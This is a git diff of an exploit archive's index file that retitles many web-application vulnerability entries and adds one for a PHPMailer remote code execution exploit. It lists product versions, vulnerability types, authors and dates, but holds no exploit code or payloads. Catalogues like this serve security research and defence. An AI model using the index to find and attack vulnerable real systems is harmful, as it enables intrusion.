 7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0
 7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-11-09,"Andreas Kurtz",jsp,webapps,0
 7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload",2008-11-10,USH,php,webapps,0
@@ -19961,17 +19962,17 @@ id,file,description,date,author,platform,type,port
 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0
 7087,platforms/php/webapps/7087.txt,"AJ Auction - Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0
-7092,platforms/php/webapps/7092.txt,"Joomla! Component com_books - (book_id) SQL Injection",2008-11-11,boom3rang,php,webapps,0
+7092,platforms/php/webapps/7092.txt,"Joomla! Component com_books - 'book_id' Parameter SQL Injection",2008-11-11,boom3rang,php,webapps,0
 7093,platforms/php/webapps/7093.txt,"Joomla! Component Contact Info 1.0 - SQL Injection",2008-11-11,boom3rang,php,webapps,0
 7094,platforms/php/webapps/7094.txt,"Pre Real Estate Listings - Arbitrary File Upload",2008-11-11,BackDoor,php,webapps,0
-7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection",2008-11-11,boom3rang,php,webapps,0
+7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component com_catalogproduction - 'id' Parameter SQL Injection",2008-11-11,boom3rang,php,webapps,0
 7096,platforms/php/webapps/7096.txt,"Joomla! Component Simple RSS Reader 1.0 - Remote File Inclusion",2008-11-11,NoGe,php,webapps,0
 7097,platforms/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0
-7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0
+7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' Parameter SQL Injection",2008-11-11,"Hussin X",php,webapps,0
 7101,platforms/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Arbitrary File Upload",2008-11-12,ZoRLu,php,webapps,0
 7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro 1.6 - Authentication Bypass",2008-11-12,ZoRLu,php,webapps,0
-7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0
-7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'code.php id' SQL Injection",2008-11-12,"Hussin X",php,webapps,0
+7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - Authentication Bypass",2008-11-12,ZoRLu,php,webapps,0
+7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'id' Parameter SQL Injection",2008-11-12,"Hussin X",php,webapps,0
 7106,platforms/php/webapps/7106.txt,"TurnkeyForms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,php,webapps,0
 7107,platforms/php/webapps/7107.txt,"TurnkeyForms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0
 7110,platforms/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0
@@ -19983,23 +19984,23 @@ id,file,description,date,author,platform,type,port
 7117,platforms/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps,0
 7118,platforms/php/webapps/7118.txt,"TurnkeyForms - Text Link Sales Authentication Bypass",2008-11-14,G4N0K,php,webapps,0
 7119,platforms/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution",2008-11-14,80vul,php,webapps,0
-7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0
+7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - Authentication Bypass",2008-11-14,R3d-D3V!L,asp,webapps,0
 7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps,0
 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0
 7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps,0
 7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0
 7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0
-7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0
-7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,php,webapps,0
+7130,platforms/php/webapps/7130.php,"Minigal b13 - Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0
+7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' Parameter SQL Injection",2008-11-16,snakespc,php,webapps,0
 7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,php,webapps,0
-7134,platforms/php/webapps/7134.txt,"PHPstore Wholesale - 'track.php?id' SQL Injection",2008-11-16,"Hussin X",php,webapps,0
+7134,platforms/php/webapps/7134.txt,"PHPstore Wholesale - 'id' Parameter SQL Injection",2008-11-16,"Hussin X",php,webapps,0
 7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 - Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0
 7137,platforms/asp/webapps/7137.txt,"OpenASP 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps,0
-7138,platforms/php/webapps/7138.txt,"E-topbiz ADManager 4 - (group) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
+7138,platforms/php/webapps/7138.txt,"E-topbiz ADManager 4 - 'group' Parameter Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0
 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps,0
-7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - (init.php includepath) Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0
-7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0
+7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - 'init.php' Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0
+7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0
 7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0
 7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0
@@ -20529,7 +20530,7 @@ id,file,description,date,author,platform,type,port
 7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0
 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 - Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0
 7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps,0
-7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - (avatar) Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
+7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
 7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0
 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0
@@ -20668,7 +20669,7 @@ id,file,description,date,author,platform,type,port
 8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps,0
 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],php,webapps,0
 8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
-8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0
+8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0
 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0
@@ -20799,7 +20800,7 @@ id,file,description,date,author,platform,type,port
 8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - (course_id) SQL Injection",2009-03-31,DarKdewiL,php,webapps,0
 8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 - (gamestat.php gameID) SQL Injection",2009-03-31,Dimi4,php,webapps,0
 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0
-8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0
+8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' Parameter SQL Injection",2009-04-01,cOndemned,php,webapps,0
 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0
 8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0
 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
@@ -20835,7 +20836,7 @@ id,file,description,date,author,platform,type,port
 8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps,0
 8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,asp,webapps,0
 8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0
-8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 Admin Access",2009-04-13,THUNDER,php,webapps,0
+8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,php,webapps,0
 8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0
 8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection",2009-04-13,Dr-HTmL,php,webapps,0
 8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps,0
@@ -21086,7 +21087,7 @@ id,file,description,date,author,platform,type,port
 8823,platforms/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0
 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0
-8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0
+8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",php,webapps,0
 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0
 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0
 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0
@@ -21397,7 +21398,7 @@ id,file,description,date,author,platform,type,port
 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0
 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0
 9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0
-9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) SQL Injection",2009-08-01,rEcruit,php,webapps,0
+9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - 'forum.php' SQL Injection",2009-08-01,rEcruit,php,webapps,0
 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusion",2009-08-01,NoGe,php,webapps,0
 9324,platforms/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0
 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0
@@ -21417,7 +21418,7 @@ id,file,description,date,author,platform,type,port
 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0
 9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps,0
 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0
-9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - (mod.php module) Local File Inclusion",2009-08-03,Qabandi,php,webapps,0
+9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,php,webapps,0
 9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0
@@ -24104,7 +24105,7 @@ id,file,description,date,author,platform,type,port
 15367,platforms/php/webapps/15367.txt,"Joomla! Component Sponsor Wall 1.1 - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
 15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0
 15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps,0
-15381,platforms/php/webapps/15381.txt,"Collabtive - SQL Injection",2010-11-01,"Anatolia Security",php,webapps,0
+15381,platforms/php/webapps/15381.txt,"Collabtive 0.65 - SQL Injection",2010-11-01,"Anatolia Security",php,webapps,0
 15382,platforms/asp/webapps/15382.txt,"douran portal 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0
 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0
 15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0
@@ -26559,8 +26560,8 @@ id,file,description,date,author,platform,type,port
 23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps,0
 23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x - Export.php File Disclosure",2004-02-03,"Cedric Cochin",php,webapps,0
 23644,platforms/php/webapps/23644.php,"PHPX 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0
-23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection",2004-02-04,G00db0y,php,webapps,0
-23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showcat.php SQL Injection",2004-02-04,G00db0y,php,webapps,0
+23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
+23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0
 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0
@@ -27329,7 +27330,7 @@ id,file,description,date,author,platform,type,port
 25200,platforms/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps,0
 25201,platforms/cgi/webapps/25201.txt,"Newsscript - Access Validation",2005-03-08,adrianc23@gmail.com,cgi,webapps,0
 25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0
-25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0
+25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0
 25212,platforms/php/webapps/25212.txt,"UBBCentral UBB.Threads 6.0 - editpost.php SQL Injection",2005-03-11,"ADZ Security Team",php,webapps,0
 25213,platforms/php/webapps/25213.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - viewall.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0
 25214,platforms/php/webapps/25214.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - category.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0
@@ -28226,7 +28227,7 @@ id,file,description,date,author,platform,type,port
 27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0
 27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0
 26408,platforms/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,AtT4CKxT3rR0r1ST,php,webapps,0
-26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - (manageuser.php task Parameter) SQL Injection",2013-06-24,drone,php,webapps,0
+26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - 'manageuser.php' SQL Injection",2013-06-24,drone,php,webapps,0
 26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",php,webapps,0
 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0
 26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - (global.php id Parameter) SQL Injection",2013-06-24,"CWH Underground",php,webapps,0
@@ -28522,7 +28523,7 @@ id,file,description,date,author,platform,type,port
 26782,platforms/php/webapps/26782.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-AdvancedSearch.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0
 26783,platforms/php/webapps/26783.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-UserLogin.php' SQL Injection",2005-12-12,Preddy,php,webapps,0
 26784,platforms/php/webapps/26784.txt,"BTGrup Admin WebController - SQL Injection",2005-12-12,khc@bsdmail.org,php,webapps,0
-26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 - Link.php SQL Injection",2005-12-12,stranger-killer,php,webapps,0
+26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 - 'Link.php' SQL Injection",2005-12-12,stranger-killer,php,webapps,0
 26786,platforms/cgi/webapps/26786.txt,"EveryAuction 1.53 - Auction.pl Cross-Site Scripting",2005-12-13,$um$id,cgi,webapps,0
 26787,platforms/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps,0
 26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - 'includes/db.php $_CCFG[_PKG_PATH_DBSE]' Parameter Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0
@@ -29082,8 +29083,8 @@ id,file,description,date,author,platform,type,port
 27497,platforms/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 - shared_order.php sharedPlanID Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
 27498,platforms/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 - dedicated_order.php dedicatedPlanID Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
 27499,platforms/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 - server_management.php plan_id Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
-27500,platforms/php/webapps/27500.txt,"Arab Portal System 2.0 - online.php title Parameter Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0
-27501,platforms/php/webapps/27501.txt,"Arab Portal System 2.0 - download.php title Parameter Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0
+27500,platforms/php/webapps/27500.txt,"Arab Portal 2.0 - 'online.php' Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0
+27501,platforms/php/webapps/27501.txt,"Arab Portal 2.0 - 'download.php' Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0
 27502,platforms/php/webapps/27502.txt,"Connect Daily 3.2.8/3.2.9 - ViewDay.html Multiple Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
 27503,platforms/php/webapps/27503.txt,"Connect Daily 3.2.8/3.2.9 - ViewSearch.html Multiple Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
 27504,platforms/php/webapps/27504.txt,"Connect Daily 3.2.8/3.2.9 - ViewYear.html Multiple Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0
@@ -30127,7 +30128,7 @@ id,file,description,date,author,platform,type,port
 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
-28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0
+28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0
 28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80
 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage Parameter) SQL Injection",2013-10-15,drone,php,webapps,80
 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0
@@ -31400,7 +31401,7 @@ id,file,description,date,author,platform,type,port
 30940,platforms/asp/webapps/30940.txt,"IPortalX - forum/login_user.asp Multiple Parameter Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0
 30941,platforms/asp/webapps/30941.txt,"IPortalX - blogs.asp Date Parameter Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0
 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0
-30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 - (managetimetracker.php id Parameter) SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80
+30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 - 'managetimetracker.php' SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80
 30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' SQL Injection",2007-12-28,"Juan Galiana Lara",php,webapps,0
 30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x - staff_del_confirm.php Multiple Parameter Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0
 30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x - theme_del_confirm.php name Parameter Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0
@@ -32441,7 +32442,7 @@ id,file,description,date,author,platform,type,port
 32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork - 'path' Parameter Remote File Inclusion",2008-11-06,DeltahackingTEAM,php,webapps,0
 32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 - SQL Injection / Cross-Site Scripting",2008-11-07,G4N0K,php,webapps,0
 32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",java,webapps,0
-32575,platforms/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
+32575,platforms/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
 32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0
 32577,platforms/asp/webapps/32577.txt,"Dizi Portali - 'film.asp' SQL Injection",2008-11-10,"Kaan KAMIS",asp,webapps,0
 32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0
@@ -36932,3 +36933,4 @@ id,file,description,date,author,platform,type,port
 40978,platforms/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps,0
 40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0
 40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
+40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
diff --git a/platforms/linux/dos/40985.txt b/platforms/linux/dos/40985.txt
new file mode 100755
index 000000000..9c971ead0
